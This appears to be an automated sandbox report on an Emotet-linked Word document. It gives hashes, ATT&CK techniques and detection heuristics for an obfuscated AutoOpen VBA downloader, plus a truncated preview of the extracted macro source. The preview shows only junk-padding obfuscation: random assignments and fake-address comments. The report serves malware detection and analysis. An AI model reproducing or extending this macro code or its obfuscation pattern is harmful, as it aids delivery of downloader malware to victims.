Emotet Office (OLE) malware analysis — malicious · 7a8a800c29c6e9db

MALICIOUS

Office (OLE)

275.5 KB Created: 2019-10-10 18:29:00 Authoring application: Microsoft Office Word First seen: 2019-12-09

MD5: dd244e178c2baf9389c3db10c9165f46 SHA-1: 2d824c3960863612420dde458ac80b63f48872ce SHA-256: 7a8a800c29c6e9dbf732d98fd5eccb9e78078101fee30d287dc534e83e58a22d

282 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The file contains heavily obfuscated VBA macros, including an AutoOpen function, and triggers heuristics for an obfuscated auto-exec loader and CreateObject calls. ClamAV identifies it as 'Doc.Downloader.Emotet-7297196-0', strongly suggesting Emotet family. The VBA code's primary function appears to be downloading and executing a secondary payload, a common Emotet tactic.

Heuristics 8

ClamAV: Doc.Downloader.Emotet-7297196-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7297196-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 72842 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	72842 bytes
SHA-256: `318b79d8fab34cfe20777868fe182321b112c59728cafa7037c629623f7cf43f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "b06411x371x13" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Control = "b660600x596, 0, 0, MSForms, TextBox" Attribute VB_Control = "c78bc00741c, 1, 1, MSForms, TextBox" Attribute VB_Control = "b01x002007c5, 2, 2, MSForms, TextBox" Attribute VB_Control = "bc207bc05xb, 3, 3, MSForms, TextBox" Attribute VB_Control = "b00b79b5219c9, 4, 4, MSForms, TextBox" Attribute VB_Control = "c050c04c970, 5, 5, MSForms, TextBox" Attribute VB_Name = "b19bc018308" Function x089000cx63() On Error Resume Next b086b036433 = False 'Future84487 Morton Plains, Devynchester, Montenegro Dynamic89206 Gibson Wells, Sporerton, Saint Kitts and Nevis b608c91x29605 = Rnd(bc90304b6cx1) x009b80x010xx = True 'District243 Cruickshank Row, Konopelskiside, Bangladesh Lead5008 Onie Village, Streichview, Burkina Faso x780802759b = Rnd(x5c5b2b08133) x5x30c057345 = False 'Senior74365 Wisoky Lake, Ryleybury, Guyana Chief374 Myrtle Viaduct, Port Katlynnmouth, Greenland x5x05203b509b = Rnd(b24020c543x7) cx8417cc40700 = False 'Central321 Medhurst Extensions, South Gage, Montenegro Global6190 Arvid Creek, Pfefferville, Puerto Rico bxx7bcb0870b = Rnd(b49b53422091) b15x0003x0899 = False 'Product084 Ruth Ville, Peterburgh, Comoros Principal389 Lera Islands, Schowalterfort, Isle of Man c26c605095xcb = Rnd(c00c55c03c8) c4983257cb8c = True 'Direct3406 Ashly Canyon, South Lonie, Iraq Global96417 King Stravenue, West Samarahaven, Guatemala c799080b0067 = Rnd(bcx06bb294001) c2x4b31749868 = False 'Forward34678 Rosalinda Underpass, Shayneton, Kyrgyz Republic Human939 Dicki Prairie, South Maxie, Indonesia x900cxb970260 = Rnd(x433b55143167) b4892bx449874 = False 'National841 Miller Rue, New Lawrenceburgh, Switzerland Product681 Olaf Land, North Martine, Papua New Guinea c326811256763 = False 'Forward91603 Hudson Falls, East Dantetown, Panama Forward60262 Schmitt Ranch, Kertzmannmouth, Guatemala b579400cx0x00 = Rnd(cx07601b683b) c69051c09x0 = False 'Central21337 Sadie Valley, Margretstad, Bosnia and Herzegovina Investor7781 Germaine Ways, Doylefurt, Philippines x98118x8700 = Rnd(x4bxb080323) b20308780405 = False 'Chief2111 Orn Trace, Lemkeville, Sudan Global00123 Kovacek Dam, New Bethel, Canada x6b00b3x0080 = Rnd(x042191901x) b2017046516 = True 'Human107 Kris Lodge, Lake Susannaport, Zimbabwe District809 White Forks, Joyfurt, Suriname x450807240071 = Rnd(b909000909b) c9900360107c6 = False 'Lead9220 Carrie Club, Raynorbury, Guam Chief078 Fritsch Neck, Kielmouth, Swaziland xx836cc0407 = Rnd(b91700782x9) bc02620050b94 = True 'Product61627 Beatty Street, Rebamouth, Philippines Corporate979 Kenyon Union, Goldnerton, Saint Martin c3c211168028 = Rnd(c0058000b132) cb053090048 = False 'Future641 Jenkins Ford, Port Shannamouth, Chile Product35464 Horacio Walks, Port Guiseppeton, Benin b12173550c1 = Rnd(bb10000x86b03) xx60x8380090 = True 'Principal291 Waters Centers, Tianaberg, Western Sahara Product66781 Rice Plaza, New Carolyn, Guatemala c9x4110bc00b0 = True 'Future01192 Gerhard Course, Port Eldredtown, Svalbard & Jan Mayen Islands Senior3274 Mack Grove, East Trystan, Nepal cb00c033c7005 = Rnd(c7640400064) cc700700802x = False 'Central268 Rolfson Valleys, Eberthaven, Australia Human9020 Hintz Shores, New Theresehaven, Belarus c0416xxb4646 = Rnd(x04929400xx02) c241x0c6206 = True 'Central493 Dickens Mount, South Billymouth, Guinea Product736 Funk Meadows, South Verlamouth, Djibouti cx34x08046000 = Rnd(bc809082x26xx) c0c6c087038 = True 'Corporate29236 Blanda Ferry, Itzelport, Botswana International3096 Mckenzie Ville, West Bartholome, Estonia c73x03cc1000 = Rnd(xc50762809500) c4x726405x9c = False 'Investor48703 Doyle Squares, West Johnathonstad, Burkina Faso International75828 Viola Flat, Gerholdville, Qatar x28x23536b0b = Rnd(b7154734020c) x0032x04007 = True 'In ... (truncated)

SHA-256: 318b79d8fab34cfe20777868fe182321b112c59728cafa7037c629623f7cf43f

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "b06411x371x13"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "b660600x596, 0, 0, MSForms, TextBox"
Attribute VB_Control = "c78bc00741c, 1, 1, MSForms, TextBox"
Attribute VB_Control = "b01x002007c5, 2, 2, MSForms, TextBox"
Attribute VB_Control = "bc207bc05xb, 3, 3, MSForms, TextBox"
Attribute VB_Control = "b00b79b5219c9, 4, 4, MSForms, TextBox"
Attribute VB_Control = "c050c04c970, 5, 5, MSForms, TextBox"

Attribute VB_Name = "b19bc018308"
Function x089000cx63()
On Error Resume Next
   b086b036433 = False
'Future84487 Morton Plains, Devynchester, Montenegro Dynamic89206 Gibson Wells, Sporerton, Saint Kitts and Nevis
b608c91x29605 = Rnd(bc90304b6cx1)
x009b80x010xx = True
'District243 Cruickshank Row, Konopelskiside, Bangladesh Lead5008 Onie Village, Streichview, Burkina Faso
x780802759b = Rnd(x5c5b2b08133)
x5x30c057345 = False
'Senior74365 Wisoky Lake, Ryleybury, Guyana Chief374 Myrtle Viaduct, Port Katlynnmouth, Greenland
x5x05203b509b = Rnd(b24020c543x7)
cx8417cc40700 = False
'Central321 Medhurst Extensions, South Gage, Montenegro Global6190 Arvid Creek, Pfefferville, Puerto Rico
bxx7bcb0870b = Rnd(b49b53422091)
b15x0003x0899 = False
'Product084 Ruth Ville, Peterburgh, Comoros Principal389 Lera Islands, Schowalterfort, Isle of Man
c26c605095xcb = Rnd(c00c55c03c8)
c4983257cb8c = True
'Direct3406 Ashly Canyon, South Lonie, Iraq Global96417 King Stravenue, West Samarahaven, Guatemala
c799080b0067 = Rnd(bcx06bb294001)
c2x4b31749868 = False
'Forward34678 Rosalinda Underpass, Shayneton, Kyrgyz Republic Human939 Dicki Prairie, South Maxie, Indonesia
x900cxb970260 = Rnd(x433b55143167)
b4892bx449874 = False
'National841 Miller Rue, New Lawrenceburgh, Switzerland Product681 Olaf Land, North Martine, Papua New Guinea
c326811256763 = False
'Forward91603 Hudson Falls, East Dantetown, Panama Forward60262 Schmitt Ranch, Kertzmannmouth, Guatemala
b579400cx0x00 = Rnd(cx07601b683b)
c69051c09x0 = False
'Central21337 Sadie Valley, Margretstad, Bosnia and Herzegovina Investor7781 Germaine Ways, Doylefurt, Philippines
x98118x8700 = Rnd(x4bxb080323)
b20308780405 = False
'Chief2111 Orn Trace, Lemkeville, Sudan Global00123 Kovacek Dam, New Bethel, Canada
x6b00b3x0080 = Rnd(x042191901x)
b2017046516 = True
'Human107 Kris Lodge, Lake Susannaport, Zimbabwe District809 White Forks, Joyfurt, Suriname
x450807240071 = Rnd(b909000909b)
c9900360107c6 = False
'Lead9220 Carrie Club, Raynorbury, Guam Chief078 Fritsch Neck, Kielmouth, Swaziland
xx836cc0407 = Rnd(b91700782x9)
bc02620050b94 = True
'Product61627 Beatty Street, Rebamouth, Philippines Corporate979 Kenyon Union, Goldnerton, Saint Martin
c3c211168028 = Rnd(c0058000b132)
cb053090048 = False
'Future641 Jenkins Ford, Port Shannamouth, Chile Product35464 Horacio Walks, Port Guiseppeton, Benin
b12173550c1 = Rnd(bb10000x86b03)
xx60x8380090 = True
'Principal291 Waters Centers, Tianaberg, Western Sahara Product66781 Rice Plaza, New Carolyn, Guatemala
   c9x4110bc00b0 = True
'Future01192 Gerhard Course, Port Eldredtown, Svalbard & Jan Mayen Islands Senior3274 Mack Grove, East Trystan, Nepal
cb00c033c7005 = Rnd(c7640400064)
cc700700802x = False
'Central268 Rolfson Valleys, Eberthaven, Australia Human9020 Hintz Shores, New Theresehaven, Belarus
c0416xxb4646 = Rnd(x04929400xx02)
c241x0c6206 = True
'Central493 Dickens Mount, South Billymouth, Guinea Product736 Funk Meadows, South Verlamouth, Djibouti
cx34x08046000 = Rnd(bc809082x26xx)
c0c6c087038 = True
'Corporate29236 Blanda Ferry, Itzelport, Botswana International3096 Mckenzie Ville, West Bartholome, Estonia
c73x03cc1000 = Rnd(xc50762809500)
c4x726405x9c = False
'Investor48703 Doyle Squares, West Johnathonstad, Burkina Faso International75828 Viola Flat, Gerholdville, Qatar
x28x23536b0b = Rnd(b7154734020c)
x0032x04007 = True
'In
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.